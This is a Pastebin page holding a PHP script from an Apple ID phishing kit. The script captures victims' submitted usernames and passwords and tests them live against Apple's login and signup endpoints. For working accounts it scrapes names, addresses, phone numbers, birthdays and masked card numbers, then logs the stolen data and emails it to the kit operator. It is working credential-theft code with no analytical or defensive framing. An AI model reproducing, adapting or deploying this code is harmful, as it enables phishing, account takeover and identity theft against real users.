Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- error_reporting(0);
- require "session_protect.php";
- require "detect_country.php";
- require "antibotlogin.php";
- require "functions.php";
- require "../../CONTROLS.php";
- $_SESSION['user'] = $_POST['user'];
- $_SESSION['pass'] = $_POST['pass'];
- $ip = $_SERVER['REMOTE_ADDR'];
- $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
- $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
- $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
- $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
- $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
- $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
- $from = $From_Address;
- $headers = "From: Apple Account <".$from.">";
- $subj = "Apple [ ".$nama_negara." - ".$ip." ]";
- $to = $Your_Email;
- $data = "
- [+]=================MyYosi=================[+]
- [+]Username : ".$_SESSION['user']."
- [+]Password : ".$_SESSION['pass']."
- [+]========================================[+]
- [+]$VictimInfo1
- [+]$VictimInfo2
- [+]$VictimInfo3
- [+]$VictimInfo4
- [+]$VictimInfo5
- [+]==================Thnx==================[+]
- ";
- function curl($url, $post = null, $usecookie = null, $sock = null, $timeout = null) {
- $ch = curl_init();
- if($post != null) {
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- }
- if($timeout != null){
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, $timeout);
- }
- if($sock != null){
- curl_setopt($ch, CURLOPT_PROXY, $sock);
- curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
- }
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53");
- if ($usecookie != null) {
- curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
- }
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $result=curl_exec ($ch);
- curl_close ($ch);
- return $result;
- }
- function getStr($string,$start,$end){
- $str = explode($start,$string);
- $str = explode($end,$str[1]);
- return $str[0];
- }
- function AppleValid($email) {
- $cookies = "cookies/".md5($_SERVER['REMOTE_ADDR']).'.txt';
- $url = "https://ams.apple.com/pages/SignUp.jsf";
- $data = "SignUpForm=SignUpForm&SignUpForm%3AemailField=".$email."&SignUpForm%3AblueCenter=Continue&javax.faces.ViewState=j_id1";
- $page = curl($url,"",$cookies);
- if($page) {
- $curl = curl($url,$data,$cookies);
- if(preg_match('/This email address is already in use for another Apple ID account/i',$curl)) {
- $result = "Valid";
- } else {
- $result = "Invalid";
- }
- } else {
- $result = "UnKnown";
- }
- @unlink($cookies);
- return $result;
- }
- function GetAddress($email, $cookies) {
- $link = "https://appleid.apple.com/account/manage";
- $result = curl($link,"",$cookies);
- preg_match('/("fullName":")(.*) /',$result, $app_name);$ex1 = explode('","', $app_name[2]);
- $apple['fullname'] = preg_replace('/\s+/', ' ', strip_tags($ex1[0]));
- $_SESSION['fullname'] = $apple['fullname'];
- $delcar[1] = str_replace("••••", "", $apple['fullname']);
- $delcar[2] = str_replace("\u2022", "", $delcar[1]);
- $clearspace = str_replace(" ", " ", $delcar[2]);
- $plode = explode(" ",$clearspace);
- if(empty($plode[2])){
- $apple['firstname'] = $plode[0];
- $_SESSION['firstname'] = $apple['firstname'];
- $apple['midlename'] = "";
- $_SESSION['midlename'] = $apple['midlename'];
- $apple['lastname'] = $plode[1];
- $_SESSION['lastname'] = $apple['lastname'];
- } else {
- $apple['firstname'] = $plode[0];
- $_SESSION['firstname'] = $apple['firstname'];
- $apple['midlename'] = $plode[1];
- $_SESSION['midlename'] = $apple['midlename'];
- $apple['lastname'] = $plode[2];
- $_SESSION['lastname'] = $apple['lastname'];
- }
- preg_match('/("line1":")(.*)/',$result, $app_address);$ex2 = explode('","', $app_address[2]);
- $apple['address'] = preg_replace('/\s+/', ' ', strip_tags($ex2[0]));
- $_SESSION['address'] = $apple['address'];
- preg_match('/(city":")(.*)/',$result, $app_city);$ex3 = explode('","', $app_city[2]);
- $apple['city'] = preg_replace('/\s+/', ' ', strip_tags($ex3[0]));
- $_SESSION['city'] = $apple['city'];
- preg_match('/(postalCode":")(.*)/',$result, $app_zip);$ex5 = explode('","', $app_zip[2]);
- $apple['zip'] = preg_replace('/\s+/', ' ', strip_tags($ex5[0]));
- $_SESSION['zip'] = $apple['zip'];
- preg_match('/(stateProvinceName":")(.*)/',$result, $app_state);$ex4 = explode('","', $app_state[2]);
- $apple['state'] = preg_replace('/\s+/', ' ', strip_tags($ex4[0]));
- if(!empty($apple['state'])){
- $_SESSION['state'] = $apple['state'];
- } else {
- $_SESSION['state'] = "-";
- }
- preg_match('/(fullNumberWithCountryPrefix":")(.*)/',$result, $app_phone);$ex6 = explode('","', $app_phone[2]);
- $X_app_phone[0] = preg_replace('/\s+/', ' ', strip_tags($ex6[0]));
- $X_app_phone[1] = str_replace(" ", "", $X_app_phone[0]);
- $X_app_phone[2] = str_replace(chr(194).chr(160), "", $X_app_phone[1]);
- $X_app_phone[3] = str_replace("+", "", $X_app_phone[2]);
- $X_app_phone[4] = str_replace("-", "", $X_app_phone[3]);
- $X_app_phone[5] = str_replace("(", "", $X_app_phone[4]);
- $X_app_phone[6] = str_replace(")", "", $X_app_phone[5]);
- $apple['phone'] = trim($X_app_phone[6]);
- $_SESSION['phone'] = $apple['phone'];
- preg_match('/(obfuscatedNumber":")(.*)/',$result, $app_carta);$ex7 = explode('","', $app_carta[2]);
- $apple['carta'] = preg_replace('/\s+/', ' ', strip_tags($ex7[0]));
- $_SESSION['carta'] = $apple['carta'];
- preg_match('/(birthday":")(.*)/',$result, $app_bith);$ex8 = explode('","', $app_bith[2]);
- $dob = preg_replace('/\s+/', ' ', strip_tags($ex8[0]));
- $pecah = explode("-",$dob);
- $apple['dob'] = $pecah[1]."/".$pecah[2]."/".$pecah[0];
- $_SESSION['dob'] = $apple['dob'];
- $json = json_encode($apple);
- $file = fopen("../logs/address/".$email.".dat", "w");
- fwrite($file, $json."\n");
- return $json;
- }
- function AppleChk($email, $password){
- $cookies = md5($_SERVER['REMOTE_ADDR']).'.txt';
- $url = "https://idmsa.apple.com/IDMSWebAuth/authenticate";
- $page = curl($url,'',$cookies);
- $data = 'appleId='.$email.'&accountPassword='.$password.'&appIdKey=af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3&accNameLocked=false&language=US-EN&path=/signin/?referrer=/account/manage&Env=PROD';
- $curl = curl($url,$data,$cookies);
- if(stripos($curl, 'Location') !== false) {
- $result['error'] = 0;
- $result['details'] = GetAddress($email, $cookies);
- $result['status'] = "Live";
- @unlink($cookies);
- } else {
- $result['error'] = 2;
- $result['status'] = "Dead";
- @unlink($cookies);
- }
- return json_encode($result);
- }
- if($True_Login == 1) {
- $applechk = AppleValid($_POST['user']);
- if ($applechk == 'Invalid') {
- echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
- exit();
- } elseif($applechk == 'UnKnown') {
- echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
- exit();
- } elseif($applechk == 'Valid') {
- if($Encrypt==1){
- include("AES.php");
- $imputText = $data;
- $imputKey = $Key;
- $blockSize = 256;
- $aes = new AES($imputText, $imputKey, $blockSize);
- $enc = $aes->encrypt();
- $aes->setData($enc);
- $dec=$aes->decrypt();
- }
- if($Save_Log==1) {
- if($Encrypt==1) {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$enc);
- fclose($file);
- }
- else {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$data);
- fclose($file);
- }
- }
- if($Send_Log==1) {
- if($Encrypt==1) {
- mail($to,$subj,$enc,$headers);
- } else {
- mail($to,$subj,$data,$headers);
- }
- } ?>
- <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
- <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
- <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
- </form>
- <script language="JavaScript">
- document.frm.submit();
- </script>
- <?php exit();
- }
- } elseif($True_Login == 2) {
- $check = AppleChk($_POST['user'], $_POST['pass']);
- $json = json_decode($check);
- if($json->status == "Dead"){
- echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
- exit();
- } elseif($json->status == "Live"){
- if($Encrypt==1){
- include("AES.php");
- $imputText = $data;
- $imputKey = $Key;
- $blockSize = 256;
- $aes = new AES($imputText, $imputKey, $blockSize);
- $enc = $aes->encrypt();
- $aes->setData($enc);
- $dec=$aes->decrypt();
- }
- if($Save_Log==1) {
- if($Encrypt==1) {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$enc);
- fclose($file);
- }
- else {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$data);
- fclose($file);
- }
- }
- if($Send_Log==1) {
- if($Encrypt==1) {
- mail($to,$subj,$enc,$headers);
- } else {
- mail($to,$subj,$data,$headers);
- }
- }
- ?>
- <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
- <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
- <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
- </form>
- <script language="JavaScript">
- document.frm.submit();
- </script>
- <?php } else {
- echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
- exit();
- }
- } else {
- if($Encrypt==1){
- include("AES.php");
- $imputText = $data;
- $imputKey = $Key;
- $blockSize = 256;
- $aes = new AES($imputText, $imputKey, $blockSize);
- $enc = $aes->encrypt();
- $aes->setData($enc);
- $dec=$aes->decrypt();
- }
- if($Save_Log==1) {
- if($Encrypt==1) {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$enc);
- fclose($file);
- }
- else {
- $file=fopen("../logs/".$Login_Log,"a");
- fwrite($file,$data);
- fclose($file);
- }
- }
- if($Send_Log==1) {
- if($Encrypt==1) {
- mail($to,$subj,$enc,$headers);
- } else {
- mail($to,$subj,$data,$headers);
- }
- } ?>
- <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
- <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
- <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
- </form>
- <script language="JavaScript">
- document.frm.submit();
- </script>
- <?php } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement